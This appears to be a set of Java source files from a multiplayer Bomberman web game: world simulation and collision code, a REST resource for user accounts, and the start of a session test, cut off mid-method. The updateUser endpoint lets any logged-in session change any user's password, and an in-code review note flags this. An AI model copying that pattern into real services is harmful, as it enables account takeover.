/** @return world height in tiles (number of rows; grid is [y][x]). */
public int getHeight() {
return tileArray.length;
}
/** @return true while anything still needs ticking: self-updating entities or pending/delayed events. */
public boolean shouldBeUpdated() {
return selfUpdatingEntities > 0 || !newEventQueue.isEmpty() || !delayedEventQueue.isEmpty();
}
/**
 * One world tick: update all entities, drain and dispatch the incoming event
 * queue by event type, then resolve bomberman movement for this time slice.
 *
 * @param deltaT time elapsed since the previous tick
 */
public void runGameLoop(long deltaT) {
updateEverything(deltaT);
// Dispatch every event that arrived since the last tick.
while (!newEventQueue.isEmpty())
{
final WorldEvent elderEvent = newEventQueue.poll();
switch (elderEvent.getEventType()){
case ENTITY_UPDATED:
processEntityUpdatedEvent(elderEvent);
break;
case TILE_SPAWNED:
processTileSpawnedEvent(elderEvent);
break;
case TILE_REMOVED:
processTileRemovedEvent(elderEvent);
break;
}
}
tryMovingBombermen(deltaT);
}
/** @return number of bombermen (players and bots) currently alive. */
public int getBombermanCount() {
return bombermen.size();
}
//// For bot AI: direct (mutable) access to the world state.
/** @return the live [y][x] tile grid; callers must not mutate it. */
public ITile[][] getTiles() {
return tileArray;
}
/** @return the live list of bombermen; callers must not mutate it. */
public ArrayList<Bomberman> getBombermen() {
return bombermen;
}
////
/** Handles an ENTITY_UPDATED event: records a movement command for the target bomberman. */
private void processEntityUpdatedEvent(WorldEvent event) {
LOGGER.debug("Processing object_updated");
assignBombermanMovement(event);
}
// Run only once at the very beginning: announces every pre-built tile to clients
// by queuing a TILE_SPAWNED event at its grid position.
private void registerNewTiles() {
for (int y = 0; y < tileArray.length; ++y) {
final ITile[] row = tileArray[y];
for (int x = 0; x < tileArray[y].length; ++x) {
final ITile tile = row[x];
if (tile != null)
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, tile.getType(), tile.getID(), x, y, null));
}
}
}
/** Handles a TILE_SPAWNED event: bombs get placement rules, other tiles are placed directly. */
private void processTileSpawnedEvent(WorldEvent event) {
LOGGER.debug("Processing object_spawned");
if (event.getEntityType() == EntityType.BOMB)
tryPlacingBomb(event.getEntityID(), false);
else placeTile(event);
}
/**
 * Handles a TILE_REMOVED event, routing by entity type: bombs explode, bomb rays
 * dissipate, bombermen die, and anything else is simply removed from the grid.
 */
private void processTileRemovedEvent(WorldEvent event) {
    LOGGER.debug("Processing object_destroyed");
    switch (event.getEntityType()) {
        case BOMB:
            explodeBomb(event);
            break;
        case BOMB_RAY:
            dissipateBombRay(event);
            break;
        case BOMBERMAN:
            killBomberman(event);
            break;
        default:
            removeTileByID(event.getEntityID(), event.getInitiator());
            break;
    }
}
/** Queues a (dx, dy, timestamp) movement command on the bomberman named by the event; warns on unknown IDs. */
private void assignBombermanMovement(WorldEvent event) {
final Bomberman actor = getBombermanByID(event.getEntityID());
if (actor == null) {
LOGGER.warn("No bomberman with id \"" + event.getEntityID() + "\" exists!");
return;
}
actor.addMovement(new Triplet<>(event.getX(), event.getY(), event.getTimestamp()));
}
// Movements are not at the same time, they have bomberman spawn priorities over timestap priorities! Bad, yet should work on small deltaT intervals.
/**
 * Replays each bomberman's queued movement commands for this tick, splitting the
 * tick into sub-intervals by command timestamp, then continues the last direction
 * for the remainder of the tick. Also maintains the self-updating entity counter
 * when a bomberman starts or stops needing updates.
 */
private void tryMovingBombermen(long deltaT) {
for (Bomberman bomberman : bombermen) {
Triplet<Float, Float, Long> previousMovement = bomberman.getMovementDirection();
final boolean wasUpdating = bomberman.shouldBeUpdated();
long timeSpentMoving = 0;
// Apply each queued command for its own sub-interval, clamped to the tick length.
while (bomberman.getMovementsDuringTick().peek() != null) {
final Triplet<Float, Float, Long> movement = bomberman.getMovementsDuringTick().poll();
long dt = movement.getValue2() - previousMovement.getValue2();
if (dt > deltaT)
dt = deltaT;
timeSpentMoving += dt;
tryMovingBomberman(bomberman, movement.getValue0(), movement.getValue1(), dt);
activateTilesWereSteppedOn(bomberman);
previousMovement = movement;
}
bomberman.setMovementDirection(previousMovement);
if (!wasUpdating && bomberman.shouldBeUpdated())
selfUpdatingEntities++;
if (wasUpdating && !bomberman.shouldBeUpdated())
selfUpdatingEntities--;
// Keep moving in the last direction for whatever is left of the tick.
tryMovingBomberman(bomberman, previousMovement.getValue0(), previousMovement.getValue1(), deltaT - timeSpentMoving);
activateTilesWereSteppedOn(bomberman);
}
}
// Hard maths. PM @Xobotun to get an explanation, don't be shy!
/**
 * Moves one bomberman along normalized direction (dx, dy) for deltaT, resolving:
 * world-border clamping, axis-aligned tile collisions, corner (diagonal) collision
 * correction, and a crude bomberman-vs-bomberman blocker (which cancels the whole
 * move). Commits the new position and emits an ENTITY_UPDATED event.
 */
@SuppressWarnings("OverlyComplexMethod")
private void tryMovingBomberman(Bomberman actor, float dx, float dy, long deltaT) {
if (dx == 0 && dy == 0 || deltaT <= 0)
return;
final int worldWidth = tileArray[0].length;
final int worldHeight = tileArray.length;
// Current position and its integer tile cell.
final float x = actor.getCoordinates()[0];
final int ix = (int) Math.floor(x);
final float y = actor.getCoordinates()[1];
final int iy = (int) Math.floor(y);
// Per-axis speed from the normalized direction vector.
final float xSpeed = actor.getMaximalSpeed() * (float) (dx / Math.sqrt(dx * dx + dy * dy));
final float ySpeed = actor.getMaximalSpeed() * (float) (dy / Math.sqrt(dx * dx + dy * dy));
float predictedX = x + xSpeed * deltaT;
float predictedY = y + ySpeed * deltaT;
final float radius = Bomberman.DIAMETER / 2;
// Tile edge the actor may collide with on each axis, chosen by movement direction.
float xBoundary = ix;
float yBoundary = iy;
if (dx == 0 && x + radius > xBoundary + 1 || dx > 0)
xBoundary++;
if (dy == 0 && y + radius > yBoundary + 1 || dy > 0)
yBoundary++;
if (predictedX - radius < 0 && x < 1) // If leaving world borders to left
predictedX = radius;
else if (predictedX + radius > worldWidth && x > worldWidth - 1) // If leaving world borders to right
predictedX = worldWidth - radius;
else if (dx < 0 && predictedX - radius < xBoundary) { // If moving left and entering left tile
final ITile leftTile = tileArray[iy][ix - 1];
if (leftTile != null && !leftTile.isPassable())
predictedX = xBoundary + radius; // If should collide, collide
}
else if (dx > 0 && predictedX + radius > xBoundary) {
final ITile rightTile = tileArray[iy][ix + 1];
if (rightTile != null && !rightTile.isPassable())
predictedX = xBoundary - radius;
}
// Same collision logic for the vertical axis.
if (predictedY - radius < 0 && y < 1)
predictedY = radius;
else if (predictedY + radius > worldHeight && y > worldHeight - 1)
predictedY = worldHeight - radius;
else if (dy < 0 && predictedY - radius < yBoundary) {
final ITile upTile = tileArray[iy - 1][ix];
if (upTile != null && !upTile.isPassable())
predictedY = yBoundary + radius;
}
else if (dy > 0 && predictedY + radius > yBoundary) {
final ITile downTile = tileArray[iy + 1][ix];
if (downTile != null && !downTile.isPassable())
predictedY = yBoundary - radius;
}
// Corner case: the circle may clip the diagonal neighbor tile; push it out along
// the axis of lesser speed. Skipped within half a tile of the world border.
//noinspection OverlyComplexBooleanExpression,MagicNumber
if (x > 0.5 && x < worldWidth - 0.5 && y > 0.5 && y < worldHeight - 0.5) {
final float xDeviationFromTileCenter = - (ix + 0.5f - predictedX);
final float yDeviationFromTileCenter = - (iy + 0.5f - predictedY);
final boolean shouldCheckX = Math.abs(xDeviationFromTileCenter) > 0.5f - radius;
final boolean shouldCheckY = Math.abs(yDeviationFromTileCenter) > 0.5f - radius;
if (shouldCheckX && shouldCheckY) {
final float distanceToXBorder = (0.5f - Math.abs(xDeviationFromTileCenter));
final float distanceToYBorder = (0.5f - Math.abs(yDeviationFromTileCenter));
final double squaredDistanceToCorner = distanceToXBorder * distanceToXBorder + distanceToYBorder * distanceToYBorder;
if (squaredDistanceToCorner < radius * radius) {
final int yTile = iy + ((yDeviationFromTileCenter > 0) ? 1 : -1);
final int xTile = ix + ((xDeviationFromTileCenter > 0) ? 1 : -1);
final ITile cornerTile = tileArray[yTile][xTile];
if (cornerTile != null && !cornerTile.isPassable())
if (Math.abs(xSpeed) > Math.abs(ySpeed)) {
final float yIntersectionCorrection = (float) Math.sqrt(radius * radius - distanceToXBorder * distanceToXBorder) - distanceToYBorder;
final int direction = (yDeviationFromTileCenter > 0) ? -1 : 1;
predictedY += yIntersectionCorrection * direction;
} else {
final float xIntersectionCorrection = (float) Math.sqrt(radius * radius - distanceToYBorder * distanceToYBorder) - distanceToXBorder;
final int direction = (xDeviationFromTileCenter > 0) ? -1 : 1;
predictedX += xIntersectionCorrection * direction;
}
}
}
}
for (Bomberman bomberman : bombermen) // Low-quality inter-bomberman collision checker.
if (bomberman.getID() != actor.getID()) {
final float xDistance = Math.abs(predictedX - bomberman.getCoordinates()[0]);
final float yDistance = Math.abs(predictedY - bomberman.getCoordinates()[1]);
final float distance = (float) Math.sqrt(xDistance * xDistance + yDistance * yDistance);
if (distance <= radius * 2 + ACTION_TILE_HANDICAP_DIAMETER)
return;
}
// Sanity check if timestep is too big
if (predictedX - radius < 0)
predictedX = radius;
if (predictedX + radius > worldWidth)
predictedX = worldWidth - radius;
if (predictedY - radius < 0)
predictedY = radius;
if (predictedY + radius > worldHeight)
predictedY = worldHeight - radius;
actor.setCoordinates(new float[]{ predictedX, predictedY});
processedEventQueue.add(new WorldEvent(EventType.ENTITY_UPDATED, EntityType.BOMBERMAN, actor.getID(), predictedX, predictedY, actor.getID()));
}
/**
 * Fires applyAction on every distinct tile under the actor's (slightly shrunk)
 * bounding box — the four corners of the handicapped radius, deduplicated.
 */
private void activateTilesWereSteppedOn(Bomberman actor) {
final float x = actor.getCoordinates()[0];
final float y = actor.getCoordinates()[1];
// Shrink the radius so grazing a tile's edge doesn't trigger it.
final float handicappedRadius = (Bomberman.DIAMETER - ACTION_TILE_HANDICAP_DIAMETER) / 2;
final Set<Pair<Integer, Integer>> uniqueTileCoordinates = new HashSet<>(4);
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x - handicappedRadius), (int) Math.floor(y - handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x - handicappedRadius), (int) Math.floor(y + handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x + handicappedRadius), (int) Math.floor(y - handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x + handicappedRadius), (int) Math.floor(y + handicappedRadius)));
final Set<ITile> uniqueTiles = new HashSet<>(4);
uniqueTiles.addAll(uniqueTileCoordinates.stream().map(uniqueCoordinate -> tileArray[uniqueCoordinate.getValue1()][uniqueCoordinate.getValue0()]).collect(Collectors.toList()));
uniqueTiles.stream().filter(uniqueTile -> uniqueTile != null).forEach(uniqueTile -> uniqueTile.applyAction(actor));
}
/**
 * Places a bomb on the tile the bomberman stands on, if he has a bomb available
 * and the tile is free — or unconditionally when force is true (death drop).
 * NOTE(review): the condition parses as (canSpawnBomb && tileFree) || force, so a
 * forced placement overwrites any tile already at [y][x] without emitting its
 * removal event — confirm that is intended.
 */
public void tryPlacingBomb(int bombermanID, boolean force) {
final Bomberman actor = getBombermanByID(bombermanID);
if (actor == null)
return;
final int x = (int) Math.floor(actor.getCoordinates()[0]);
final int y = (int) Math.floor(actor.getCoordinates()[1]);
if (actor.canSpawnBomb() && tileArray[y][x] == null || force)
{
tileArray[y][x] = TileFactory.getInstance().getNewTile(EntityType.BOMB, this, actor, getNextID());
actor.takeOnePlaceableBomb();
actor.resetBombTimer();
selfUpdatingEntities++;
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, EntityType.BOMB, tileArray[y][x].getID(), x, y, bombermanID));
}
}
@SuppressWarnings("OverlyComplexMethod")
private void explodeBomb(WorldEvent event) {
int x = -1;
int y = -1;
Ownable bomb = null;
for (int j = 0; j < tileArray.length; ++j)
for (int i = 0; i < tileArray[0].length; ++i)
if (tileArray[j][i] != null && tileArray[j][i].getID() == event.getEntityID()) {
x = i;
y = j;
bomb = (Ownable) tileArray[y][x];
}
if (bomb == null) {
LOGGER.error("Non-existent bomb #" + event.getEntityID() + " has exploded! O_o");
return;
}
final Bomberman owner = bomb.getOwner();
final int radius = owner.getBombExplosionRange();
tileArray[y][x] = null;
owner.returnOnePlaceableBomb();
selfUpdatingEntities--;
processedEventQueue.add(event);
for (int i = 0; i >= -radius; --i)
if (x + i >= 0)
if (destroyTileAndSpawnRay(x + i, y, owner))
break;
for (int i = 1; i <= radius; ++i)
if (x + i < tileArray[0].length)
if (destroyTileAndSpawnRay(x + i, y, owner))
break;
for (int i = -1; i >= -radius; --i)
if (y + i >= 0)
if (destroyTileAndSpawnRay(x, y + i, owner))
break;
for (int i = 1; i <= radius; ++i)
if (y + i < tileArray.length)
if (destroyTileAndSpawnRay(x, y + i, owner))
break;
}
/**
 * Explosion step at (x, y): indestructible tiles stop the ray; destructible tiles
 * are removed (and also stop it); a ray tile is spawned wherever the cell ends up empty.
 *
 * @return true if propagation should stop past this cell.
 */
private boolean destroyTileAndSpawnRay(int x, int y, Bomberman owner) {
if (tileArray[y][x] != null && !tileArray[y][x].isDestructible()) // stop if undestuctible
return true;
boolean result = false;
if (tileArray[y][x] != null && tileArray[y][x].isDestructible()) {
// Loop: removal handlers may place another tile here (e.g. a death-drop bomb).
while (tileArray[y][x] != null)
processTileRemovedEvent(new WorldEvent(EventType.TILE_REMOVED, tileArray[y][x].getType(), tileArray[y][x].getID(), x, y, owner.getID()));
result = true; // if destructible, destroy tile, spawn ray and break loop.
}
if (tileArray[y][x] == null) {
tileArray[y][x] = TileFactory.getInstance().getNewTile(EntityType.BOMB_RAY, this, owner, getNextID());
selfUpdatingEntities++;
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, EntityType.BOMB_RAY, tileArray[y][x].getID(), x, y, owner.getID()));
}
return result;
}
/**
 * Handles a ray-dissipation event: removes the bomb-ray tile by id, stops
 * ticking it, and republishes the event as processed.
 */
private void dissipateBombRay(WorldEvent event) {
    removeTileByID(event.getEntityID(), event.getInitiator());
    selfUpdatingEntities--;
    processedEventQueue.add(event);
}
/**
 * Removes a bomberman from the world. If his drop-bomb-on-death perk is
 * active, a bomb is placed at his position first.
 * A failed lookup is tolerated: ArrayList.remove(null) is a no-op and the
 * event is still republished as processed.
 */
private void killBomberman(WorldEvent event) {
    final Bomberman deadOne = getBombermanByID(event.getEntityID());
    if (deadOne != null && deadOne.shouldDropBombOnDeath())
        tryPlacingBomb(deadOne.getID(), true);  // 'true' presumably forces placement — confirm against tryPlacingBomb
    bombermen.remove(deadOne);
    processedEventQueue.add(event);
}
/**
 * Rolls a PERCENT_TO_SPAWN_BONUS% chance and, on success, schedules a random
 * bonus tile to appear at (x, y) once the bomb ray there has dissipated
 * (delayed by BOMB_RAY_DURATION).
 */
private void decideToSpawnRandomBonus(int x, int y) {
    if (randomizer.nextInt(100) >= PERCENT_TO_SPAWN_BONUS)
        return;
    final EntityType type;
    // BUGFIX: the previous Math.abs(randomizer.nextInt() % bound) could yield a
    // negative index, because Math.abs(Integer.MIN_VALUE) is still negative.
    // nextInt(bound) is uniform in [0, bound) and can never be negative.
    // (Assumes TileFactory.getBonusCount() > 0 — nextInt throws otherwise.)
    switch (randomizer.nextInt(TileFactory.getBonusCount())) {
        case 0:
            type = EntityType.BONUS_INCMAXRANGE;
            break;
        case 1:
            type = EntityType.BONUS_DECBOMBSPAWN;
            break;
        case 2:
            type = EntityType.BONUS_INCMAXHP;
            break;
        case 3:
            type = EntityType.BONUS_INCSPEED;
            break;
        case 4:
            type = EntityType.BONUS_MOREBOMBS;
            break;
        case 5:
            type = EntityType.BONUS_DROPBOMBONDEATH;
            break;
        case 6:
            type = EntityType.BONUS_INVUL;
            break;
        default:
            // Reachable only if getBonusCount() exceeds the cases above.
            LOGGER.warn("Random bonus number generator failed! It is out of the known bonus range!");
            return;
    }
    LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
    delayedEventQueue.add(new Pair<>(new WorldEvent(EventType.TILE_SPAWNED, type, getNextID(), x, y, null), TimeHelper.now() + BombRayBehavior.BOMB_RAY_DURATION));
}
/**
 * Finds a bomberman by entity id.
 * Scans the whole list and keeps the original "last match wins" semantics
 * (relevant only if ids were ever duplicated).
 *
 * @return the matching bomberman, or null when absent.
 */
@Nullable
private Bomberman getBombermanByID(int id) {
    return bombermen.stream()
            .filter(bomberman -> bomberman.getID() == id)
            .reduce((first, second) -> second)  // last match, as before
            .orElse(null);
}
/**
 * Advances every live entity by deltaT and promotes delayed events whose due
 * time has arrived into the fresh-event queue.
 */
private void updateEverything(long deltaT) {
    bombermen.forEach(bomberman -> bomberman.update(deltaT));
    for (ITile[] row : tileArray)
        for (ITile tile : row)
            if (tile != null)
                tile.update(deltaT);
    // Flush every due delayed event into newEventQueue. removeIf traverses the
    // ConcurrentLinkedQueue in order, so due events are promoted in FIFO order
    // just like the original stream-and-remove version.
    delayedEventQueue.removeIf(delayed -> {
        if (TimeHelper.now() < delayed.getValue1())
            return false;
        newEventQueue.add(delayed.getValue0());
        return true;
    });
}
/**
 * Deletes every tile whose id matches, emitting a TILE_REMOVED event for each
 * and possibly scheduling a random bonus in its place.
 *
 * @param initiator id of the entity responsible, or null for "the world".
 */
private void removeTileByID(int id, @Nullable Integer initiator) {
    for (int row = 0; row < tileArray.length; ++row)
        for (int col = 0; col < tileArray[0].length; ++col) {
            final ITile tile = tileArray[row][col];
            if (tile == null || tile.getID() != id)
                continue;
            if (tile.shouldSpawnBonusOnDestruction())
                decideToSpawnRandomBonus(col, row);
            processedEventQueue.add(new WorldEvent(EventType.TILE_REMOVED, tile.getType(), tile.getID(), col, row, initiator));
            tileArray[row][col] = null;
        }
}
/**
 * Spawns the tile described by the event at the event's grid coordinates
 * (coordinates arrive as floats and are truncated to cell indices) and
 * republishes the event as processed. Overwrites whatever occupied the cell.
 */
private void placeTile(WorldEvent event) {
    final ITile newTile = TileFactory.getInstance().getNewTile(event.getEntityType(), this, event.getEntityID());
    tileArray[(int) event.getY()][(int) event.getX()] = newTile;
    processedEventQueue.add(event);
}
// Events generated during the current tick, waiting to be processed.
private final Queue<WorldEvent> newEventQueue = new ConcurrentLinkedQueue<>();
// Fully processed events; the state describer drains this queue.
private final Queue<WorldEvent> processedEventQueue = new ConcurrentLinkedQueue<>();
// Events paired with the TimeHelper.now() timestamp at which they become due.
private final Queue<Pair<WorldEvent, Long>> delayedEventQueue = new ConcurrentLinkedQueue<>();
// Monotonic source of unique entity ids.
private final AtomicInteger uidManager = new AtomicInteger(0);
private final Random randomizer = new Random();
private final String name;
// Indexed as tileArray[y][x]; null means an empty cell.
private final ITile[][] tileArray;
private final ArrayList<Bomberman> bombermen = new ArrayList<>(4);
// Per-player spawn coordinates — presumably {x, y} pairs; TODO confirm.
private final float[][] spawnLocations;
// Count of tiles (bombs, rays, ...) that need update() calls each tick.
private int selfUpdatingEntities = 0;
// NOTE(review): the original comment was truncated ("0.75-0.05 will…") —
// appears to shrink an action tile's effective diameter by this margin; confirm.
public static final float ACTION_TILE_HANDICAP_DIAMETER = 0.05f;
public static final int PERCENT_TO_SPAWN_BONUS = 20;
private static final Logger LOGGER = LogManager.getLogger(World.class);
}
<file_sep>/src/main/java/rest/Users.java
package rest;
import main.accountservice.AccountService;
import javax.imageio.ImageIO;
import javax.inject.Inject;
import javax.inject.Singleton;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.*;
import javax.ws.rs.core.*;
import main.UserTokenManager;
import org.imgscalr.Scalr;
import org.jetbrains.annotations.TestOnly;
import org.json.*;
import java.awt.image.BufferedImage;
import java.awt.image.RenderedImage;
import java.io.File;
import java.io.IOException;
import java.util.Collection;
import java.util.Map;
import java.util.Properties;
/**
 * REST resource for user accounts: registration, listing, top-10, update,
 * userpic upload and deletion. Collaborators are pulled lazily from the
 * injected context on first request (see setup()).
 */
@Singleton
@Path("user/")
public class Users {
    @Inject
    private main.config.Context context;

    /**
     * Lazily resolves the account service and static-content settings from the
     * injected context. Runs the resolution only once per instance.
     */
    public void setup() {
        if (!wasSetUp) {
            wasSetUp = true;
            @SuppressWarnings("unchecked") final Map<String, String> properties = (Map<String, String>) context.get(Properties.class);
            this.accountService = (AccountService) context.get(AccountService.class);
            this.staticPath = properties.get("static_path");
            this.userpicWidth = Integer.parseInt(properties.get("userpic_width"));
            this.userpicHeight = Integer.parseInt(properties.get("userpic_height"));
        }
    }

    /** Test hook: swap the context and force setup() to run again. */
    @TestOnly
    public void setContext(@SuppressWarnings("SameParameterValue") main.config.Context context) {
        wasSetUp = false;
        this.context = context;
    }

    /**
     * PUT /user — registers a new user and logs him in.
     * Expects {"login", "password"} plus an optional "isGuest" flag; any
     * previous session of the caller is invalidated first.
     */
    @PUT
    @Consumes(MediaType.APPLICATION_JSON)
    @Produces(MediaType.APPLICATION_JSON)
    public Response createUser(String jsonString, @Context HttpHeaders headers) {
        setup();
        // A fresh registration invalidates whatever session the caller had.
        accountService.logoutUser(UserTokenManager.getSIDStringFromHeaders(headers));
        final JSONObject jsonRequest;
        try {
            jsonRequest = new JSONObject(jsonString);
        } catch (JSONException ex) {
            return WebErrorManager.badJSON();
        }
        final JSONArray errorList = WebErrorManager.showFieldsNotPresent(jsonRequest, "login", "password");
        if (errorList != null)
            return WebErrorManager.accessForbidden(errorList);
        final String login = jsonRequest.get("login").toString();
        final String password = jsonRequest.get("password").toString();
        final boolean isGuest = jsonRequest.has("isGuest") && jsonRequest.getBoolean("isGuest");
        final UserProfile newUser = accountService.createNewUser(login, password, isGuest);
        if (newUser == null)
            return WebErrorManager.accessForbidden("User already exists!");
        accountService.loginUser(newUser);
        return Response.ok(new JSONObject().put("id", newUser.getId()).toString())
                .cookie(UserTokenManager.getNewCookieWithSessionID(newUser.getSessionID())).build();
    }

    /** GET /user — lists every known user as a JSON array. */
    @GET
    @Produces(MediaType.APPLICATION_JSON)
    public Response getAllUsers() {
        setup();
        final Collection<UserProfile> userData = accountService.getAllUsers();
        if (userData == null)
            return WebErrorManager.serverError();
        final JSONArray responseJSON = new JSONArray();
        for (UserProfile user : userData)
            responseJSON.put(user.toJson());
        return Response.ok(responseJSON.toString()).build();
    }

    /** GET /user/top10 — lists the ten best-scoring users. */
    @GET
    @Path("top10")
    @Produces(MediaType.APPLICATION_JSON)
    public Response getTop10Users() {
        setup();
        final Collection<UserProfile> userData = accountService.getTop10Users();
        if (userData == null)
            return WebErrorManager.serverError();
        final JSONArray responseJSON = new JSONArray();
        for (UserProfile user : userData)
            responseJSON.put(user.toJson());
        return Response.ok(responseJSON.toString()).build();
    }

    /** GET /user/{id} — a single user's profile, or 403 when unknown. */
    @GET
    @Path("{id}")
    @Produces(MediaType.APPLICATION_JSON)
    public Response getUserByID(@PathParam("id") Long id) {
        setup();
        final UserProfile user = accountService.getUser(id);
        if (user == null)
            return WebErrorManager.accessForbidden();
        return Response.ok(user.toJson().toString()).build();
    }

    /**
     * POST /user — updates a user identified by "login", optionally changing
     * the password. Requires an authenticated session.
     * NOTE(review): any authenticated session may change any login's password —
     * confirm this authorization model is intended.
     */
    @POST
    @Consumes(MediaType.APPLICATION_JSON)
    @Produces(MediaType.APPLICATION_JSON)
    public Response updateUser(String jsonString, @Context HttpHeaders headers) {
        setup();
        if (!accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers)))
            return WebErrorManager.authorizationRequired("Not logged in!");
        final JSONObject jsonRequest;
        try {
            jsonRequest = new JSONObject(jsonString);
        } catch (JSONException ex) {
            return WebErrorManager.badJSON();
        }
        final JSONArray errorList = WebErrorManager.showFieldsNotPresent(jsonRequest, "login");
        if (errorList != null)
            return WebErrorManager.accessForbidden(errorList);
        final String login = jsonRequest.get("login").toString();
        final UserProfile user = accountService.getUser(login);
        if (user == null)
            return WebErrorManager.serverError("Session exists, but user does not!");
        // BUGFIX: jsonRequest.get("password") threw an uncaught JSONException
        // when the field was absent, defeating the null check that followed.
        // optString makes "password" genuinely optional.
        final String password = jsonRequest.optString("password", null);
        if (password != null)
            user.setPassword(password);
        accountService.updateUser(user);
        return Response.ok(new JSONObject().put("id", user.getId()).toString()).build();
    }

    /**
     * POST /user (multipart) — replaces the logged-in user's picture with the
     * uploaded "userpic" part, resized to the configured dimensions.
     */
    @POST
    @Consumes(MediaType.MULTIPART_FORM_DATA)
    @Produces(MediaType.APPLICATION_JSON)
    public Response updateUserPic(HttpServletRequest request, @Context HttpHeaders headers) {
        setup();
        if (!accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers)))
            return WebErrorManager.authorizationRequired("Not logged in!");
        final RenderedImage newUserpic;
        //noinspection OverlyBroadCatchBlock
        try {
            // BUGFIX: request.getPart() returns a javax.servlet.http.Part, not a
            // java.io.File — the old "(File) request.getPart(...)" cast always
            // threw ClassCastException, so every upload failed with
            // "Could not parse uploaded file!". Read the part's stream instead.
            final BufferedImage resizableImage = ImageIO.read(request.getPart("userpic").getInputStream());
            newUserpic = Scalr.resize(resizableImage, userpicWidth, userpicHeight);
        } catch (Exception ex) {
            return WebErrorManager.badRequest("Could not parse uploaded file!");
        }
        final UserProfile user = accountService.getBySessionID(UserTokenManager.getSIDStringFromHeaders(headers));
        if (user == null)
            return WebErrorManager.serverError("Session exists, but user does not!");
        final String path = (user.getUserpicPath() == null)
                ? staticPath + "user" + user.getId() + ".jpg"
                : user.getUserpicPath();
        try {
            // BUGFIX: the informal format name is "jpg", not ".jpg" — with an
            // unknown format ImageIO.write just returns false without writing.
            if (!ImageIO.write(newUserpic, "jpg", new File(path)))
                return WebErrorManager.serverError("Could not save new picture!");
        } catch (IOException ex) {
            // BUGFIX: the error response used to be built and *discarded*,
            // silently reporting success on a failed write.
            return WebErrorManager.serverError("Could not save new picture!");
        }
        accountService.updateUserpic(user, path);
        return Response.ok(new JSONObject().put("userpic", user.getId()).toString()).build();
    }

    /**
     * DELETE /user/{id} — deletes the caller's own account (and logs him out).
     * Deleting anyone else's account is forbidden.
     */
    @DELETE
    @Path("{id}")
    @Produces(MediaType.APPLICATION_JSON)
    public Response deleteUser(@PathParam("id") Long id, @Context HttpHeaders headers) {
        setup();
        if (!accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers)))
            return WebErrorManager.authorizationRequired("Not logged in!");
        final UserProfile supplicant = accountService.getBySessionID(UserTokenManager.getSIDStringFromHeaders(headers));
        if (supplicant == null)
            return WebErrorManager.serverError("Session exists, but user does not!");
        // Null-safe, unboxing-safe comparison: id is a boxed Long from the path.
        if (id == null || id.longValue() != supplicant.getId())
            return WebErrorManager.accessForbidden("Not your user!");
        accountService.logoutUser(supplicant.getSessionID());
        accountService.deleteUser(id);
        return WebErrorManager.ok();
    }

    private AccountService accountService;
    private String staticPath;
    private int userpicWidth;
    private int userpicHeight;
    private boolean wasSetUp = false;
}
<file_sep>/src/test/java/rest/SessionsTest.java
package rest;
import constants.Constants;
import main.accountservice.AccountService;
import main.UserTokenManager;
import main.config.Context;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotSame;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
import org.glassfish.jersey.test.JerseyTest;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.core.*;
/**
 * JerseyTest-based unit tests for the Sessions REST resource (login, session
 * check, logout). All collaborators are mocked via Constants.RestApplicationMocks,
 * so no real account service or HTTP stack is exercised; responses are compared
 * by their toString() and entity representations.
 *
 * NOTE(review): the literal "<PASSWORD>" tokens below look like redaction
 * artifacts (probably Constants.USER_PASSWORD originally) — this file will not
 * compile until they are restored.
 */
public class SessionsTest extends JerseyTest {
    // --- login ----------------------------------------------------------------
    @Test
    public void testOkLogin() {
        testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_OK), true);
    }
    @Test
    public void testWrongLoginLogin() {
        testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_WRONG_LOGIN), false);
    }
    @Test
    public void testWrongPasswordLogin() {
        testLogin(RequestFactory.getLoginTestData(RequestFactory.LoginRequestType.LOGIN_WRONG_PASSWORD), false);
    }
    // --- session check --------------------------------------------------------
    @Test
    public void testOkIsAuthenticated() {
        testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_OK));
    }
    @Test
    public void testNoCookieIsAuthenticated() {
        testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_NO_COOKIE));
    }
    @Test
    public void testWrongCookieIsAuthenticated() {
        testIsAuthenticated(RequestFactory.getIsAuthenticatedTestData(RequestFactory.IsAuthRequestType.IS_AUTH_WRONG_COOKIE));
    }
    // --- logout ---------------------------------------------------------------
    @Test
    public void testOkLogout() {
        testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_LOGGED));
    }
    @Test
    public void testNoCookieLogout() {
        testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_NOT_LOGGED));
    }
    @Test
    public void testWrongCookieLogout() {
        testLogout(RequestFactory.getLogoutTestData(RequestFactory.LogoutRequestType.LOGOUT_WRONG_COOKIE));
    }
    // Re-inject the shared mock context before every test.
    @Before
    public void setContext() {
        sessions.setContext(CONTEXT);
    }
    /**
     * Drives Sessions.loginUser with prepared (body, headers, expected response)
     * data and additionally checks the session cookie presence/value.
     */
    public void testLogin(Triplet<String, HttpHeaders, Response> data, boolean shouldHaveCookie) {
        final Response response = sessions.loginUser(data.getValue0(), data.getValue1());
        assertEquals(data.getValue2().toString(), response.toString());
        assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
        if (shouldHaveCookie)
